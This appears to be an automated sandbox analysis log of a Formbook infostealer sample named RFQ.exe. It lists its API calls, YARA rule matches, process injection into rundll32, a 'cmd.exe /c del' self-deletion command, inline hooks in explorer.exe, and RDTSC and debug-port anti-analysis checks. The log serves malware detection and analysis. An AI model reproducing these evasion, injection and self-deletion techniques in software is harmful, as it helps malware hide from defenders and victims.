Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046795F0 NtQueryInformationFile, 14_2_046795F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679670 NtQueryInformationProcess, 14_2_04679670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679610 NtEnumerateValueKey, 14_2_04679610
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679760 NtOpenProcess, 14_2_04679760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0467A770 NtOpenThread, 14_2_0467A770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679770 NtSetInformationFile,14_2_04679770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679730 NtQueryVirtualMemory,14_2_04679730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467A710 NtOpenProcessToken,14_2_0467A710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046797A0 NtUnmapViewOfSection,14_2_046797A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467B040 NtSuspendThread,14_2_0467B040
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679820 NtEnumerateKey,14_2_04679820
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046798F0 NtReadVirtualMemory,14_2_046798F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046798A0 NtWriteVirtualMemory,14_2_046798A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679950 NtQueueApcThread,14_2_04679950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046799D0 NtCreateProcessEx,14_2_046799D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679A20 NtResumeThread,14_2_04679A20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679A00 NtProtectVirtualMemory,14_2_04679A00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679A10 NtQuerySection,14_2_04679A10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679A80 NtOpenDirectoryObject,14_2_04679A80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679B00 NtSetValueKey,14_2_04679B00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467A3B0 NtGetContextThread,14_2_0467A3B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00659D60 NtCreateFile,14_2_00659D60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00659E10 NtReadFile,14_2_00659E10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00659E90 NtClose,14_2_00659E90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00659F40 NtAllocateVirtualMemory,14_2_00659F40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00659E0B NtReadFile,14_2_00659E0B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00659E8A NtClose,14_2_00659E8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00659F3A NtAllocateVirtualMemory,14_2_00659F3A
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_075D6010
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_075D1D7D
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_075D0040
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_075D0006
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_0041E841
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_0041D018
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_00401030
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_0041E1FC
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_00402D87
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_00402D90
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_00409E40
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_00409E3B
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_0041E7E7
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_00402FB0
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_046FD466
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0464841F
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_04701D55
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_04630D20
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_04702D07
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0464D5E0
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_047025DD
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_04662581
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_04656E30
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_046FD616
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_04702EF7
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_04701FF1
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_046F1002
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_047028EC
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_046620A0
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_047020A8
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0464B090
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_04654120
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0463F900
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_047022AE
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_04702B28
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_046FDBD2
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0466EBB0
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0065E1FC
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_00642D87
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_00642D90
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_00649E40
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_00649E3B
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_00642FB0
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 0463B150 appears 35 times
          Source: RFQ.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: RFQ.exe, Binary or memory string: OriginalFilename vs RFQ.exe
          Source: RFQ.exe, 00000000.00000000.326713042.00000000009B2000.00000002.00020000.sdmp, Binary or memory string: OriginalFilenameD vs RFQ.exe
          Source: RFQ.exe, 00000007.00000002.444723171.000000000165F000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
          Source: RFQ.exe, 00000007.00000002.444419638.00000000012C8000.00000004.00000020.sdmp, Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs RFQ.exe
          Source: RFQ.exe, 00000007.00000000.391061443.0000000000AB2000.00000002.00020000.sdmp, Binary or memory string: OriginalFilenameD vs RFQ.exe
          Source: RFQ.exe, Binary or memory string: OriginalFilenameD vs RFQ.exe
          Source: RFQ.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.395391792.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.395391792.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.592662426.0000000000640000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.592662426.0000000000640000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.443676021.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.443676021.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.444182169.00000000011F0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.444182169.00000000011F0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.593093257.0000000000840000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.593093257.0000000000840000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine, Classification label: mal100.troj.evad.winEXE@7/1@3/2
          Source: C:\Users\user\Desktop\RFQ.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ.exe.log
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
          Source: C:\Users\user\Desktop\RFQ.exe, Mutant created: \Sessions\1\BaseNamedObjects\iNvBcjNipEgPNF
          Source: RFQ.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RFQ.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\RFQ.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: RFQ.exe, Virustotal: Detection: 35%
          Source: RFQ.exe, ReversingLabs: Detection: 16%
          Source: unknown, Process created: C:\Users\user\Desktop\RFQ.exe 'C:\Users\user\Desktop\RFQ.exe'
          Source: unknown, Process created: C:\Users\user\Desktop\RFQ.exe {path}
          Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ.exe'
          Source: unknown, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RFQ.exe, Process created: C:\Users\user\Desktop\RFQ.exe {path}
          Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ.exe'
          Source: C:\Windows\explorer.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\RFQ.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: RFQ.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: RFQ.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.426278317.000000000EF20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000007.00000002.444723171.000000000165F000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.595187979.0000000004610000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ.exe, 00000007.00000002.444723171.000000000165F000.00000040.00000001.sdmp, rundll32.exe
          Source: Binary string: rundll32.pdb source: RFQ.exe, 00000007.00000002.444396323.00000000012A9000.00000004.00000020.sdmp
          Source: Binary string: rundll32.pdbGCTL source: RFQ.exe, 00000007.00000002.444396323.00000000012A9000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.426278317.000000000EF20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_05411598 push eax; mov dword ptr [esp], ecx 0_2_0541159C
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_075D224A push cs; ret 0_2_075D224C
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_075D02D2 push 0000002Eh; ret 0_2_075D02D4
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_075D12C2 push ds; ret 0_2_075D12C3
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_075D22A3 push cs; ret 0_2_075D22A4
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_004170A0 pushfd ; retf 7_2_004170A6
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_0041CEB5 push eax; ret 7_2_0041CF08
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_0041CF6C push eax; ret 7_2_0041CF72
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_0041CF02 push eax; ret 7_2_0041CF08
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_0041CF0B push eax; ret 7_2_0041CF72
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0468D0D1 push ecx; ret 14_2_0468D0E4
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_006570A0 pushfd ; retf 14_2_006570A6
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0065CEB5 push eax; ret 14_2_0065CF08
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0065CF6C push eax; ret 14_2_0065CF72
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0065CF02 push eax; ret 14_2_0065CF08
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0065CF0B push eax; ret 14_2_0065CF72

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe, User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE3
          Source: C:\Users\user\Desktop\RFQ.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\RFQ.exe, RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ.exe, RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe, RDTSC instruction interceptor: First address: 00000000006498E4 second address: 00000000006498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe, RDTSC instruction interceptor: First address: 0000000000649B5E second address: 0000000000649B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\RFQ.exe, Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\RFQ.exe TID: 7112, Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\RFQ.exe TID: 6796, Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5572, Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exe, Last function: Thread delayed
          Source: explorer.exe, 00000008.00000000.423725449.00000000083EB000.00000004.00000001.sdmp, Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000008.00000000.423831795.0000000008430000.00000004.00000001.sdmp, Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000008.00000002.608752063.0000000005D50000.00000002.00000001.sdmp, Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000008.00000000.418197319.00000000063F6000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.423725449.00000000083EB000.00000004.00000001.sdmp, Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000008.00000000.422618645.00000000082E2000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000008.00000002.608752063.0000000005D50000.00000002.00000001.sdmp, Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000008.00000002.608752063.0000000005D50000.00000002.00000001.sdmp, Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000008.00000000.422618645.00000000082E2000.00000004.00000001.sdmp, Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000008.00000000.423831795.0000000008430000.00000004.00000001.sdmp, Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000008.00000002.593605277.000000000095C000.00000004.00000020.sdmp, Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000008.00000002.608752063.0000000005D50000.00000002.00000001.sdmp, Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\RFQ.exe, Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\RFQ.exe, Process queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exe, Process queried: DebugPort
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\RFQ.exe, Code function: 7_2_0040ACD0 LdrLoadDll
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0465746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0466A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_046CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0466BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_046B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0470740D mov eax, dword ptr fs:[00000030h]14_2_0470740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0470740D mov eax, dword ptr fs:[00000030h]14_2_0470740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0470740D mov eax, dword ptr fs:[00000030h]14_2_0470740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F14FB mov eax, dword ptr fs:[00000030h]14_2_046F14FB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6CF0 mov eax, dword ptr fs:[00000030h]14_2_046B6CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6CF0 mov eax, dword ptr fs:[00000030h]14_2_046B6CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6CF0 mov eax, dword ptr fs:[00000030h]14_2_046B6CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04708CD6 mov eax, dword ptr fs:[00000030h]14_2_04708CD6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464849B mov eax, dword ptr fs:[00000030h]14_2_0464849B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465C577 mov eax, dword ptr fs:[00000030h]14_2_0465C577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465C577 mov eax, dword ptr fs:[00000030h]14_2_0465C577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04673D43 mov eax, dword ptr fs:[00000030h]14_2_04673D43
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B3540 mov eax, dword ptr fs:[00000030h]14_2_046B3540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04657D50 mov eax, dword ptr fs:[00000030h]14_2_04657D50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04708D34 mov eax, dword ptr fs:[00000030h]14_2_04708D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
